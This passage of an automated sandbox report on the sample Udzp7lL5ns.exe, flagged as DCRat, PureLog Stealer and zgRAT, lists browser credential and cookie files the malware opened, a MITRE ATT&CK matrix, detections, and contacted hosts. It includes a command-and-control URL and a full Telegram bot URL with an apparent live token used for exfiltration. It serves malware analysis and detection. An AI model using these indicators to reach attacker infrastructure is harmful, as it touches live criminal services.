                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2152938013.0000000012956000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Udzp7lL5ns.exe PID: 348, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Memory Compression.exe PID: 8040, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: Udzp7lL5ns.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.Udzp7lL5ns.exe.2b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2053026799.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: Udzp7lL5ns.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.Udzp7lL5ns.exe.2b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts11
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		2
                            File and Directory Discovery                            		1
                            Taint Shared Content                            		1
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		11
                            Process Injection                            		2
                            Obfuscated Files or Information                            		LSASS Memory124
                            System Information Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		1
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		2
                            Software Packing                            		Security Account Manager211
                            Security Software Discovery                            		SMB/Windows Admin Shares1
                            Clipboard Data                            		11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron31
                            Registry Run Keys / Startup Folder                            		31
                            Registry Run Keys / Startup Folder                            		1
                            DLL Side-Loading                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            File Deletion                            		LSA Secrets141
                            Virtualization/Sandbox Evasion                            		SSHKeylogging14
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts132
                            Masquerading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                            Virtualization/Sandbox Evasion                            		DCSync1
                            Remote System Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                            Process Injection                            		Proc Filesystem11
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589185 Sample: Udzp7lL5ns.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 70 api.telegram.org 2->70 72 586580cm.renyash.ru 2->72 74 ipinfo.io 2->74 84 Suricata IDS alerts for network traffic 2->84 86 Antivirus detection for URL or domain 2->86 88 Antivirus detection for dropped file 2->88 92 15 other signatures 2->92 8 Udzp7lL5ns.exe 10 36 2->8         started        12 ApplicationFrameHost.exe 2 2->12         started        14 svchost.exe 2->14         started        17 8 other processes 2->17 signatures3 90 Uses the Telegram API (likely for C&C communication) 70->90 process4 dnsIp5 54 C:\Windows\...\LaHYItspByFGQiJUMBgDGadp.exe, PE32 8->54 dropped 56 C:\Windows\...\ApplicationFrameHost.exe, PE32 8->56 dropped 58 C:\Users\user\Desktop\wJHXBnLy.log, PE32 8->58 dropped 60 11 other malicious files 8->60 dropped 102 Creates an undocumented autostart registry key 8->102 104 Creates multiple autostart registry keys 8->104 106 Creates an autostart registry key pointing to binary in C:\Windows 8->106 110 3 other signatures 8->110 19 cmd.exe 8->19         started        22 csc.exe 4 8->22         started        25 csc.exe 4 8->25         started        27 9 other processes 8->27 108 Multi AV Scanner detection for dropped file 12->108 82 127.0.0.1 unknown unknown 14->82 file6 signatures7 process8 file9 94 Uses ping.exe to sleep 19->94 96 Uses ping.exe to check the status of other devices and networks 19->96 29 Memory Compression.exe 19->29         started        46 3 other processes 19->46 50 C:\Program Files (x86)\...\msedge.exe, PE32 22->50 dropped 98 Infects executable files (exe, dll, sys, html) 22->98 34 conhost.exe 22->34         started        36 cvtres.exe 1 22->36         started        52 C:\Windows\...\SecurityHealthSystray.exe, PE32 25->52 dropped 38 conhost.exe 25->38         started        40 cvtres.exe 1 25->40         started        100 Loading BitLocker PowerShell Module 27->100 42 conhost.exe 27->42         started        44 conhost.exe 27->44         started        48 5 other processes 27->48 signatures10 process11 dnsIp12 76 586580cm.renyash.ru 104.21.38.84, 49729, 49739, 49746 CLOUDFLARENETUS United States 29->76 78 api.telegram.org 149.154.167.220, 443, 49963 TELEGRAMRU United Kingdom 29->78 80 ipinfo.io 34.117.59.81, 443, 49947, 49955 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 29->80 62 C:\Users\user\Desktop\cflUKPKy.log, PE32 29->62 dropped 64 C:\Users\user\Desktop\SxREamFR.log, PE32 29->64 dropped 66 C:\Users\user\Desktop\MvRfNUhf.log, PE32 29->66 dropped 68 2 other malicious files 29->68 dropped 112 Tries to harvest and steal browser information (history, passwords, etc) 29->112 file13 signatures14

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            Udzp7lL5ns.exe68%VirustotalBrowse
                            Udzp7lL5ns.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            Udzp7lL5ns.exe100%AviraHEUR/AGEN.1323342
                            Udzp7lL5ns.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\Desktop\BQKoNvFu.log100%AviraTR/PSW.Agent.qngqt
                            C:\Users\user\Desktop\EnQNlhbf.log100%AviraTR/PSW.Agent.qngqt
                            C:\Users\user\AppData\Local\Temp\grqPBzywzR.bat100%AviraBAT/Delbat.C
                            C:\Program Files (x86)\Windows Mail\Memory Compression.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\Desktop\HJnNqbKj.log100%Joe Sandbox ML
                            C:\Users\user\Desktop\DHvXeCGn.log100%Joe Sandbox ML
                            C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\BQKoNvFu.log100%Joe Sandbox ML
                            C:\Users\user\Desktop\EnQNlhbf.log100%Joe Sandbox ML
                            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Windows Mail\Memory Compression.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Windows Mail\Memory Compression.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\BQKoNvFu.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\DHvXeCGn.log8%ReversingLabs
                            C:\Users\user\Desktop\EnQNlhbf.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\HJnNqbKj.log8%ReversingLabs
                            C:\Users\user\Desktop\MvRfNUhf.log25%ReversingLabs
                            C:\Users\user\Desktop\SxREamFR.log4%ReversingLabs
                            C:\Users\user\Desktop\XMmLkVMA.log25%ReversingLabs
                            C:\Users\user\Desktop\cflUKPKy.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\maoHSLGQ.log4%ReversingLabs
                            C:\Users\user\Desktop\wJHXBnLy.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://crl.microsoK0%Avira URL Cloudsafe
                            http://osoft.co0%Avira URL Cloudsafe
                            http://crl.micros_%0%Avira URL Cloudsafe
                            http://586580cm.renyash.ru/eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            586580cm.renyash.ru
                            		104.21.38.84
                            		truetrue
                              		unknown
                              ipinfo.io
                              		34.117.59.81
                              		truefalse
                                		high
                                api.telegram.org
                                		149.154.167.220
                                		truefalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://api.telegram.org/bot8039401524:AAFcWGDQGg-hS6lbQGiVB_qWg821-l6LJqk/sendPhotofalse
                                    		high
                                    https://ipinfo.io/countryfalse
                                      		high
                                      http://586580cm.renyash.ru/eternallowProcessDefaultLinuxWindowsflowerTrackTemp.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://ipinfo.io/ipfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                          		high
                                          http://nuget.org/NuGet.exepowershell.exe, 0000001F.00000002.3614208898.000002CB347D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2424544008.00000228F6D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3442371664.0000019A41208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/botUdzp7lL5ns.exe, 00000000.00000002.2117112709.0000000002722000.00000002.00000001.01000000.00000000.sdmp, maoHSLGQ.log.0.drfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001F.00000002.2270217837.000002CB24989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2267127141.0000020710689000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2192004223.00000228E6EE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2262803738.0000019A313B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2267830088.0000016AABCD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.microsoKpowershell.exe, 00000022.00000002.2683456773.00000228FF2A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://osoft.copowershell.exe, 00000020.00000002.3616080866.00000207287C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                                              		high
                                                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000035.00000003.2294093672.00000260F6C10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                                                    		high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                                                        		high
                                                                        https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000035.00000003.2294093672.00000260F6C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001F.00000002.2270217837.000002CB24989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2267127141.0000020710689000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2192004223.00000228E6EE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2262803738.0000019A313B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2267830088.0000016AABCD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.3614208898.000002CB347D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2424544008.00000228F6D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3442371664.0000019A41208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://aka.ms/pscore68powershell.exe, 0000001F.00000002.2270217837.000002CB24761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2267127141.0000020710461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2192004223.00000228E6CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2262803738.0000019A31191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2267830088.0000016AABAB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289909271.0000018013731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUdzp7lL5ns.exe, 00000000.00000002.2117240064.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2270217837.000002CB24761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2267127141.0000020710461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2192004223.00000228E6CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2262803738.0000019A31191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2267830088.0000016AABAB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289909271.0000018013731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drfalse
                                                                                        		high
                                                                                        http://crl.micros_%powershell.exe, 00000020.00000002.3616080866.00000207287C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

